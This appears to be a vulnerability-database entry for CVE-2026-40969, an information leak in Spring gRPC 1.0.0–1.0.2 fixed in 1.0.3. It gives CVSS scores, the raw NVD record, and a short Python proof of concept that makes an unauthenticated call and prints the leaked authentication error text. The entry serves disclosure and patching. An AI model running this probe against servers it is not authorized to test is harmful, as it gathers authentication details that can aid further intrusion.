Security Vulnerability Report
CVE-2026-40969 CVSS 3.7 LOW

CVE-2026-40969

Published: 2026-04-28 15:16:31
Last Modified: 2026-04-30 13:24:42

Description

The raw message of every server-side AuthenticationException is returned to the unauthenticated remote caller in the gRPC status description. This allows an attacker to obtain information about the authentication failure, which may be useful for further attacks. Affected versions: Spring gRPC: 1.0.0 - 1.0.2 (fixed in 1.0.3). Older, unsupported versions are also affected.

CVSS Details

CVSS Score
3.7 (Secondary source; the Primary entry in the raw JSON record below scores it 5.3 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, differing only in Attack Complexity: Low)
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness
CWE-209 (Generation of Error Message Containing Sensitive Information)

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_grpc:*:*:*:*:*:*:*:* - VULNERABLE
Spring gRPC 1.0.0 - 1.0.2
Older unsupported versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import grpc

# Target vulnerable gRPC server address
TARGET_SERVER = "localhost:9090"

# This PoC demonstrates the information leak by triggering an authentication failure
# without providing valid credentials.


def check_info_leak():
    # Create an insecure channel to the target
    with grpc.insecure_channel(TARGET_SERVER) as channel:
        # In a real scenario, create a stub from the generated proto files.
        # Here we simulate a generic call that requires authentication;
        # bytes() serves as an identity (de)serializer for the raw payload.
        try:
            # Attempt to call a protected method without metadata/token.
            # This triggers the server-side AuthenticationException.
            stub = channel.unary_unary(
                '/service.path/SecureMethod',
                request_serializer=bytes,
                response_deserializer=bytes,
            )
            response = stub(b"test_payload")
        except grpc.RpcError as e:
            # The vulnerability: the raw exception message is exposed in details().
            # A server running 1.0.3 or later returns only a generic description here.
            print(f"[+] Status Code: {e.code()}")
            print(f"[+] Leaked Authentication Info: {e.details()}")


if __name__ == "__main__":
    check_info_leak()

References

https://spring.io/security/cve-2026-40969 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-40969",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-28T15:16:30.560",
    "lastModified": "2026-04-30T13:24:42.033",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The raw message of every server-side AuthenticationException is returned to the unauthenticated remote caller in the gRPC status description. This allows an attacker to obtain information about the authentication failure, which may be useful for further attacks.\n\nAffected versions:\nSpring gRPC: 1.0.0 - 1.0.2 (fixed in 1.0.3). Older, unsupported versions are also affected."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-209"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vmware:spring_grpc:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.0.3",
                "matchCriteriaId": "4B816748-EE94-4935-A81F-E9542FB2E3D2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://spring.io/security/cve-2026-40969",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}